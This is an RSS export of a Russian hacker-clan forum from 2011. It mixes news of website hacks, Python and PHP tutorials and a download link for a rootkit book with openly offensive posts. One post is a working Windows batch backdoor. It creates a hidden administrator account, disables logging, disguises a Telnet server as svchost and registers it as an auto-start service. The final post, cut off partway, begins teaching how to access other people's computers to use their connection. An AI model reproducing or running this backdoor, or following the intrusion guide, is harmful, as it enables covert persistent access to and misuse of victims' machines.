<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://netxak.apbb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>Клан хакеров V@mpirs</title>
		<link>http://netxak.apbb.ru/</link>
		<description>Клан хакеров V@mpirs</description>
		<language>ru-ru</language>
		<lastBuildDate>Thu, 03 Feb 2011 14:04:46 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>самые нашумевшие взломы</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=12#p12</link>
			<description>&lt;p&gt;Взломан сайт партии регионов&lt;/p&gt;
						&lt;p&gt;При этом на взломанных страницах также появилась информация о том, что эти действия являются ответом на взлом сайта общественного движения «Фронт перемен», который произошел 2сентября. Сообщения подписаны «Ваш А.Я.», а ниже распол &lt;br /&gt;Неизвестные взломали сайт Партии регионов. На взломанных страницах сайта появилась надпись HACKED by FRONT ZMIN.&lt;/p&gt;
						&lt;p&gt;При этом на взломанных страницах также появилась информация о том, что эти действия являются ответом на взлом сайта общественного движения «Фронт перемен», который произошел 2 сентября.&lt;/p&gt;
						&lt;p&gt;Сообщения подписаны «Ваш А.Я.», а ниже расположен постскриптум: «Юлечка, я тебя всегда любил, я знаю — ты все сможешь. Держись».&lt;/p&gt;
						&lt;p&gt;На данный момент взломанные страницы удалены с сайта ПР, пишут Українські Новини.&lt;/p&gt;
						&lt;p&gt;Партия регионов обвиняет власть в блокировании работы своего сайта. Об этом каналу «Рада» заявила депутат Анна Герман, сообщает Українська правда.&lt;/p&gt;
						&lt;p&gt;«Наш сайт выключен властью, и они пытаются перевести вину на «Фронт перемен» Арсения Яценюка. Я хочу заявить, что Яценюк никогда не употреблял грязных методов против оппонентов», — заявила депутат. «Это дело власти, которая пытается закрыть рот оппозиции», — добавила Герман.&lt;br /&gt;----------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Взломан сайт Касперского&lt;/p&gt;
						&lt;p&gt;Официальная страница малайзийского представительства Антивируса Касперского была взломана вчера турецким хакером. Кроме этого он взломал интернет магазин и несколько других поддоменов.&lt;/p&gt;
						&lt;p&gt;Поводом для атак являлся &amp;quot;патриотизм&amp;quot;, а техническим методом проникновения была SQL-инъекция. Зеркало дефейса официального сайта Касперского можно увидеть здесь, а вот так выглядел интернет магазин после взлома.&lt;/p&gt;
						&lt;p&gt;На каждом сайте изменены главные и несколько других страниц. Хотя это выглядит как обычный дефейс, инцидент мог затронуть пользователей, скачавших ознакомительные копии Антивируса Касперского. В теории нападавший мог загрузить на сайт измененную программу, содержащую трояна, заражая таким образом ничего не подозревающих пользователей, пытающихся скачать антивирус с сайта Касперского.&lt;/p&gt;
						&lt;p&gt;Это уже не первый взлом сайтов Касперского, полный список, состоящий из 36 инцидентов, можно посмотреть здесь:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.zone-h.org/content/view/14978/31/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.zone-h.org/content/view/14978/31/&lt;/a&gt;&lt;br /&gt;----------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Взломан сайт МВД Ингушетии&lt;/p&gt;
						&lt;p&gt;Представитель МВД Ингушетии сообщил, что неизвестные хакеры взломали сайт силового ведомства. В свою очередь информация о взломе сайта президента республики не подтверждается.&lt;br /&gt;Напомним, сайт МВД Ингушетии (wwwmvd-ri.ru) перестал работать 13.09.2009 . Также в среду вечером возникли проблемы у пользователей сайта президента республики (wwwingushetia.ru).&lt;/p&gt;
						&lt;p&gt;&amp;quot;Сегодня уже можно говорить, что сайт (МВД) атаковали хакеры. Пока нельзя сказать, когда сайт возобновит свою работу. Мы просто будем искать другой хостинг, другой канал&amp;quot;, – приводит сообщение официального представителя МВД РИА Новости.&lt;/p&gt;
						&lt;p&gt;В свою очередь пресс-служба президента Ингушетии информацию об атаке хакеров опровергла.&lt;/p&gt;
						&lt;p&gt;&amp;quot;Данная информация не соответствует действительности. Официальный сайт Республики Ингушетия wwwingushetia.ru продолжает работу в штатном режиме&amp;quot;, – сказал представитель пресс-службы.&lt;/p&gt;
						&lt;p&gt;Как сообщается, сейчас специалисты выясняют, почему страницу могут постетиь не все пользователи интернета.&lt;br /&gt;----------------------------------------------------------------------------------------------------------------------------------------------&lt;/p&gt;
						&lt;p&gt;Взломан сайт Western Union&lt;/p&gt;
						&lt;p&gt;C сервера известной трансферной компании похищена информация о счетах 15.700 клиентов. &lt;/p&gt;
						&lt;p&gt;Ccылаясь на информацию агентства Associated Press, The Register сообщает, что администрация трансферного магната Western Union признала в прошедшее воскресенье факт взлома сайта компании. Неизвестные хакеры воспользовались отсутствием защиты сервера и похитили данные о счетах 15.700 клиентов, которым Western Union предоставляла услуги по переводу денежных средств через Интернет. Первые проникновения в систему были зафиксированы еще в пятницу. В выходные дни Western Union начала оповещать своих клиентов и технические службы Visa и MasterCard. На данный момент случаев использования украденной информации пока не зафиксировано.&lt;/p&gt;
						&lt;p&gt;Пресс-секретарь Western Union Питер Зиверц считает, что дело не в технологических недоработках, а в &amp;quot;безмозглости системных администраторов&amp;quot;. Ответственные за функциональную поддержку работы сервера сотрудники непреднамеренно оставили всю систему без защиты. Зиверц выразил уверенность, что взлом произошел без участия служащих компании, но все же считает не лишним подождать, пока ФБР закончит следствие.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 14:04:46 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=12#p12</guid>
		</item>
		<item>
			<title>О том, как работает Python</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=11#p11</link>
			<description>&lt;p&gt;Интерпретатор&lt;/p&gt;
						&lt;p&gt;Интерпретатор — это такая программа, которая выполняет другие программы. Когда вы пишете программу на языке Python, интерпретатор читает вашу программу и выполняет содержащиеся в ней инструкции. В действительности, интерпретатор — это слой программной логики между вашим программным кодом и аппаратурой вашего компьютера.&lt;br /&gt;В зависимости от используемой версии Python сам интерпретатор может быть реализован как программа на языке C, как набор классов Java и в каком-либо другом виде, но об этом позже.&lt;br /&gt;Запуск сценария в консоли&lt;/p&gt;
						&lt;p&gt;Давайте запустите в консоле интерпретатор:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;# python&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Теперь он ожидает ввода комманд, введите туда следующую инструкцию:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;print &#039;hello world!&#039;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;ура, наша первая программа! &lt;/p&gt;
						&lt;p&gt;Запуск сценария из файла&lt;/p&gt;
						&lt;p&gt;Создайте файл «prog.py», с содержимым:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;# вывести &amp;quot;hello world&amp;quot;
print &amp;quot;hello world&amp;quot;

# вывести 2 в 10 степени
print 2 ** 10&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;и выполните этот файл:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;# python /path/to/prog.py&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Вы увидите в консоли результат, поехали дальше!&lt;br /&gt;Динамическая компиляция и байт-код&lt;/p&gt;
						&lt;p&gt;После того, как запустите сценарий, Python сначала компилирует исходный текст сценария в байт-код для виртуальной машины. Компиляция — это просто этап перевода, а байт-код это низкоуровневое платформонезависимое представление исходного текста программы. Python транслирует каждую инструкцию в исходном коде сценария в группы инструкций байт-кода для повышения скорости выполнения программы, так как байт-код выполняется намного быстрее. После компиляции в байт-код, создается файл с расширением «.pyc» по соседству с исходным текстом сценария.&lt;br /&gt;В следующий раз, когда вы запустите свою программу интерпретатор минует этап компиляции и отдаст на выполнение откомпилированный файл с расширением «.pyc». Однако, если вы изменили исходные тексты вашей программы, то снова произойдет этап компиляции в байт-код, так как Python автоматически следит за датой изменения файла с исходным кодом.&lt;br /&gt;Если Python окажется не в состоянии записать файл с байт-кодом, например из-за отсутствия прав на запись на диск, то программа не пострадает, просто байт-код будет собран в памяти и при завершении программы оттуда удален.&lt;br /&gt;Виртуальная машина Python (PVM)&lt;/p&gt;
						&lt;p&gt;После того как пройдет процесс компиляции, байт-код передается механизму под названием виртуальная машина, которая и выполнит инструкции из байт-кода. Виртуальная машина — это механизм времени выполнения, она всегда присутствует в составе системы Python и это крайняя составляющая системы под названием «Интерпретатор Python».&lt;/p&gt;
						&lt;p&gt;Для закрепления пройденного еще раз проясним ситуацию, компиляция в байт-код производится автоматически, а PVM — это всего лишь часть системы Python, которую вы установили вместе с интерпретатором и компилятором. Все происходит прозрачно для программиста, и вам не надо выполнять эти операции вручную.&lt;br /&gt;Производительность&lt;/p&gt;
						&lt;p&gt;Программисты имеющие опыт работы с такими языками как C и C++, могут заметить некоторые отличия в модели выполнения Python. Первое — это отсутствие этапа сборки или вызова утилиты «make», программы на Python могут быть сразу же запущены после написания исходного кода. Второе отличие — байт-код не является двоичным машинным кодом (например инструкции для микропроцессора Intel), он является внутренним представлением программы на языке Python.&lt;br /&gt;По этим причинам программы на Python не могут выполняться также быстро как на C/C++. Обход инструкций выполняет виртуальная система, а не микропроцессор, и чтобы выполнить байт-код, необходима дополнительная интерпретация, инструкции которой требуют большего времени, чем машинные инструкции микропроцессора.&lt;br /&gt;Однако, с другой стороны, в отличии от традиционных интерпретаторов, например как в PHP, здесь присутствует дополнительный этап компиляции — интерпретатору не требуется каждый раз анализировать исходный текст программы.&lt;br /&gt;В итоге, Python по производительности находится между традиционными компилирующими и традиционными интерпретирующими языками программирования.&lt;br /&gt;Альтернативные реализации Python&lt;/p&gt;
						&lt;p&gt;То что было сказано выше о компиляторе и виртуальной машине, характерно для стандартной реализации Python, так называемой CPython (реализации на ANSI C). Однако также существует альтернативные реализации, такие как Jython и IronPython, о которых пойдет сейчас речь.&lt;br /&gt;CPython&lt;/p&gt;
						&lt;p&gt;Это стандартная и оригинальная реализация Python, названа так, потому что написана на ANSI C. Именно ее мы установили, когда выбрали пакет ActivePython или установили из FreeBSD портов. Поскольку это эталонная реализация, она как правило работает быстрее, устойчивее и лучше, чем альтернативные реализации.&lt;br /&gt;Jython&lt;/p&gt;
						&lt;p&gt;Первоначальное название JPython, основная цель — тесная интеграция с языком программирования Java. Реализация Jython состоит из Java-классов, которые выполняют компиляцию программного кода на языке Python в байт-код Java и затем передают полученный байт-код виртуальной машине Java (JVM).&lt;br /&gt;Цель Jython состоит в том, чтобы позволить программам на языке Python управлять Java-приложениями, точно также как CPython может управлять компонентами на языках C/C++. Эта реализация имеет беcшовную интеграцию с Java. Поскольку программный код на Python транслируется в байт-код Java, во время выполнения он ведет себя точно также, как настоящая программа на языке Java. Программы на Jython могут выступать в качестве апплетов и сервлетов, создавать графический интерфейс с использованием механизмов Java и т.д. Более того, Jython обеспечивает поддержку возможности импортировать и использовать Java-классы в программном коде Python.&lt;br /&gt;Тем не менее, поскольку реализация Jython обеспечивает более низкую скорость выполнения и менее устойчива по сравнению с CPython, она представляет интерес скорее для разработчиков программ на языке Java, которым необходим язык сценариев в качестве интерфейса к Java-коду.&lt;br /&gt;IronPython&lt;/p&gt;
						&lt;p&gt;Реализация предназначена для обеспечения интеграции программ Python с приложениями, созданными для работы в среде Microsoft .NET Framework операционной системы Windows, а также в Mono — открытом эквиваленте для Linux. Платформа .NET и среда выполнения языка C# предназначены для обеспечения взаимодействия между программными объектами — независимо от используемого языка программирования, в духе более ранней модели COM компании Microsoft.&lt;br /&gt;IronPython позволяет программам на языке Python играть роль как клиентских, так и серверных компонентов, доступных из других языков программирования .NET. Поскольку разработка ведется компанией Microsoft, от IronPython, помимо прочего, можно было бы ожидать существенной оптимизации производительности.&lt;br /&gt;Средства оптимизации скорости выполнения&lt;/p&gt;
						&lt;p&gt;Существуют и другие реализации, включая динамический компилятор Psyco и транслятор Shedskin C++, которые пытаются оптимизировать основную модель выполнения.&lt;br /&gt;Динамический компилятор Psyco&lt;/p&gt;
						&lt;p&gt;Система Psyco — это компонент, расширяющий модель выполнения байт-кода, что позволяет программам выполняться быстрее. Psyco является расширением PVM, которое собирает и использует информацию о типах, чтобы транслировать части байт-кода программы в истинный двоичный машинный код, который выполняется гораздо быстрее. Для такой трансляции не требуется вносить изменения в исходный код или производить дополнительную компиляцию в ходе разработки.&lt;br /&gt;Во время выполнения программы, Psyco собирает информацию о типах объектов, и затем эта информация используется для генерации высокоэффективного машинного кода, оптимизированного для объектов этого типа. После этого произведенный машинный код заменяет соответствующие участки байт-кода, тем самым увеличивается скорость выполнения.&lt;br /&gt;В идеале некоторые участки программного кода под управление Psyco могут выполняться также быстро, как скомпилированный код на языке Си.&lt;br /&gt;Psyco обеспечивает увеличение скорости от 2 до 100 раз, но обычно в 4 раза, при использовании немодифицированного интерпретатора Python. Единственный минус у Psyco, это то обстоятельство, что в настоящее время он способен генерировать машинный код только для архитектуры Intel x86.&lt;br /&gt;Psyco не идет в стандартной поставке, его надо скачать и установить отдельно. Еще есть проект PyPy, который представляет собой попытку переписать PVM с целью оптимизации кода как в Psyco, проект PyPy собирается поглотить в большей мере проект Psyco.&lt;br /&gt;Транслятор Shedskin C++&lt;/p&gt;
						&lt;p&gt;Shedskin — это система, которая преобразует исходный код на языке Python в исходный код на языке C++, который затем может быть скомпилирован в машинный код. Кроме того, система реализует платформонезависемый подход к выполнению программного кода Python.&lt;br /&gt;Фиксированные двоичные файлы (frozen binaries)&lt;/p&gt;
						&lt;p&gt;Иногда необходимо из своих программ на Python создавать самостоятельные исполняемые файлы. Это необходимо скорее для упаковки и распространения программ.&lt;br /&gt;Фиксированные двоичные файлы объединяют в единый файл пакета байт-код программ, PVM и файлы поддержки, необходимые программам. В результате получается единственный исполняемый файл, например файл с расширение «.exe» для Windows.&lt;br /&gt;На сегодняшний день существует три основных инструмента создания «frozen binaries»:&lt;br /&gt;py2exe — он может создавать автономные программы для Windows, использующие библиотеки Tkinter, PMW, wxPython и PyGTK для создания графического интерфейса, программы использующие программные средства создания игр PyGame, клиентские программы win32com и многие другие;&lt;br /&gt;PyInstaller — напоминает py2exe, но также работает в Linux и UNIX и способен производить самоустанавливающиеся исполняемые файлы;&lt;br /&gt;freeze — оригинальная версия.&lt;br /&gt;Вам надо загружать эти инструменты отдельно от Python, они распространяются бесплатно.&lt;br /&gt;Фиксированные двоичные файлы имеют немалый размер, ибо они содержат в себе PVM, но по современным меркам из все же нельзя назвать необычно большими. Так как интерпретатор Python встроен непосредственно в фиксированные двоичные файлы, его установка не является обязательным требованием для запуска программ на принимающей стороне.&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; (C) adword&lt;/p&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 13:54:57 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=11#p11</guid>
		</item>
		<item>
			<title>PHP в примерах</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=10#p10</link>
			<description>&lt;p&gt;Замена нескольких пробелов на один:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;&amp;lt;? 
  $string=&amp;quot;Здесь много лишних пробелов!&amp;quot;; 
  $string=ereg_replace(&amp;quot; +&amp;quot;,&amp;quot; &amp;quot;,$string); 
  echo $string;  
 ?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Удаление лишних пробелов по-левому и правому боку текста:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;&amp;lt;? 
  $string=&amp;quot; Текст с лишними пробелами по бокам. &amp;quot;; 
  $string=trim($string); 
  echo $string;  
  ?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Удаление лишних пробелов по-левому боку текста:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;&amp;lt;? 
  $string=&amp;quot; Текст с лишними пробелами по бокам.&amp;quot;; 
  $string=ltrim($string); 
  echo $string;  
  ?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;Удаление лишних пробелов по-правому боку текста:&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;&amp;lt;? 
  $string=&amp;quot;Текст с лишними пробелами по бокам. &amp;quot;; 
  $string=rtrim($string); 
  echo $string;  
  ?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Создаём массив $array, где каждый ключ будет равняться номеру строки в файле:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 9em&quot;&gt;&lt;pre&gt;&amp;lt;? 
  $file=file(&amp;quot;my_file.txt&amp;quot;); 
  print_r($file);  
  ?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Объединяем 3 файла в один массив, а именно в $new_array:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 35em&quot;&gt;&lt;pre&gt;&amp;lt;? 
  $files=array( 
  &amp;quot;file1.txt&amp;quot;, # первый файл 
  &amp;quot;file2.txt&amp;quot;, # второй файл 
  &amp;quot;file3.txt&amp;quot; # третий файл 
  ); 

for($i=0;$i&amp;lt;count($files);$i++) 
  { 
  $array[]=file($files[$i]); 
  } 

while(list(,$result)=each($array)) 
  { 
  for($i=0;$i&amp;lt;count($result);$i++) 
  { 
  $new_array[]=$result[$i]; 
  } 
  } 

print_r($new_array); #выводим массив 
  ?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 13:46:29 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=10#p10</guid>
		</item>
		<item>
			<title>Rootkits под Windows</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=9#p9</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://img15.nnm.ru/c/f/3/f/d/0e3ee5eb444480845804b9ad4a4.jpg&quot; alt=&quot;http://img15.nnm.ru/c/f/3/f/d/0e3ee5eb444480845804b9ad4a4.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;Rootkits под Windows. Теория и практика программирования &amp;quot;шапок-невидимок&amp;quot;&lt;br /&gt;Автор: Колисниченко Д. Н.&lt;br /&gt;Издательство: Наука и Техника, Санкт-Петербург&lt;br /&gt;Год: 2006&lt;br /&gt;Формат: djvu&lt;br /&gt;Страниц: 296 &lt;br /&gt;Язык: Русский&lt;/p&gt;
						&lt;p&gt;Описание:&lt;br /&gt;Руткит ( rootkit троян) - это программа или набор программ для скрытого взятия под контроль взломанной системы. На платформе Windows скрытность обеспечивается тем, что руткиты перехватывают системные функции и структуры данных, подменяя их своим кодом и данными. Благодаря этой подмене, руткит может замаскировать присутствие в системе посторонних процессов, файлов, сетевых соединений, ключей реестра и т. п., выступая таким образом в роли своеобразной программной шапки-невидимки.&lt;br /&gt;Описанию руткитных технологий программированию и удалению руткитов как раз и посвящена данная книга. В первой главе книги рассмотрено несколько популярных руткитов. Следующие главы знакомят читателя с принципами работы руткита. Приведены многочисленные примеры кода, иллюстрирующие различные руткитные технологии.&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://depositfiles.com/files/8e3rvginn&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;скачать&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 13:38:34 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=9#p9</guid>
		</item>
		<item>
			<title>[FAQ] - Для новичков</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=8#p8</link>
			<description>&lt;p&gt;топик для новичков. Будет работать по принципу Вопрос-Ответ.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 13:33:37 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=8#p8</guid>
		</item>
		<item>
			<title>полноценный бэкдор</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=7#p7</link>
			<description>&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 35em&quot;&gt;&lt;pre&gt;@echo off 
@start %windir%/system32/spider.exe 
net localgroup TelnetClients /add 
net user Admin 123456 /add 
net localgroup ¤¬ЁЁбва в®ал Admin /add 
net localgroup TelnetClients Admin /add 
Windows Registry Editor Version 5.00 &amp;gt; C:System.reg  
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t] &amp;gt;&amp;gt; C:System.reg  
&amp;quot;Admin&amp;quot;=dword:00000000 &amp;gt;&amp;gt; c:System.reg  
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftTelnetServer 1.0]&amp;gt;&amp;gt; c:System.reg 
&amp;quot;LoginScript&amp;quot;=hex(2):63,00,6d,00,64,00,00,00&amp;gt;&amp;gt; c:System.reg  
&amp;quot;TelnetPort&amp;quot;=dword:00006987&amp;gt;&amp;gt; c:System.reg  
&amp;quot;MaxConnections&amp;quot;=dword:0000000A&amp;gt;&amp;gt; c:System.reg  
&amp;quot;EventLoggingEnabled&amp;quot;=dword:00000000&amp;gt;&amp;gt; c:System.reg  
&amp;quot;DisconnectKillAllApps&amp;quot;=dword:00000000&amp;gt;&amp;gt; c:System.reg  
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftTelnetServer 1.0ReadConfig]&amp;gt;&amp;gt; c:System.reg  
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftTelnetServer Defaults]&amp;gt;&amp;gt; c:System.reg  
regedit /s c:System.reg &amp;amp;&amp;amp; DEL c:System.reg  
COPY %windir%system32tlntsvr.exe %windir%system32&amp;quot;svchost.exeя&amp;quot; 
assoc .exeя=exefile 
sc create &amp;quot;WMI-Client&amp;quot; binpath= &amp;quot;%windir%\system32\svchost.exeя&amp;quot; start= auto 
&amp;quot;svchost.exeя&amp;quot; /service 
sc description WMI-Client &amp;quot;Microsoft WMI-Client&amp;quot; 
sc start WMI-Client&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 13:30:12 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=7#p7</guid>
		</item>
		<item>
			<title>Взлом чужого компьютера</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=6#p6</link>
			<description>&lt;p&gt;Я тебя научу как-раз заходить на чужие компы - сидеть в интернете на чужой счёт (Халява). Обьясняю принцип : Когда ты выходишь в Интернет, то ты входишь в сеть (т.е. имеется возможность заходить на другие компы!). Приготовления : Зайди в &amp;quot;Мой компьтер&amp;quot; --&amp;gt; &amp;quot;Панель Управления&amp;quot; --&amp;gt; &amp;quot;Сеть&amp;quot;. Должны быть установлены следущие компоненты : Клиент для сетей Microsoft Контроллер удаленного доступа NetBEUI TCP/IP Наверняка у тебя нет &amp;quot;Клинта для сетей Microsoft&amp;quot; и &amp;quot;NetBEUI&amp;quot;. Клиент : Кнопка &amp;quot;Добавить&amp;quot; --&amp;gt; &amp;quot;&amp;quot;. В отрывшем окне выбери &amp;quot;клиент&amp;quot;, справа - &amp;quot;Клиент для сетей Microsoft&amp;quot;. NetBEUI : Кнопка &amp;quot;Добавить&amp;quot; --&amp;gt; &amp;quot;&amp;quot;. В отрывшем окне выбери &amp;quot;Протокол&amp;quot;. В отрывшем окне выбери &amp;quot;Microsoft&amp;quot;, - &amp;quot;NETBEUI&amp;quot;. Всё,Нажми &amp;quot;ОК&amp;quot;, перезагрузись . &lt;br /&gt;Дальше мы настроем свойства соединения : &lt;br /&gt;Зайди в &amp;quot;Мой компьютер&amp;quot; --&amp;gt; &amp;quot;Удаленный доступ к сети&amp;quot;. &lt;br /&gt;Выбери своё соединение, вызови &amp;quot;Свойства&amp;quot;. &lt;br /&gt;На Вкладке &amp;quot;Тип сервера&amp;quot; должны быть галочки на : &lt;/p&gt;
						&lt;p&gt;Войти в сеть &lt;br /&gt;Программное сжатие данных &lt;br /&gt;NetBEUI &lt;br /&gt;TCP/IP &lt;br /&gt;Каких нет добавь! Итак, с настройками все ОК. &lt;/p&gt;
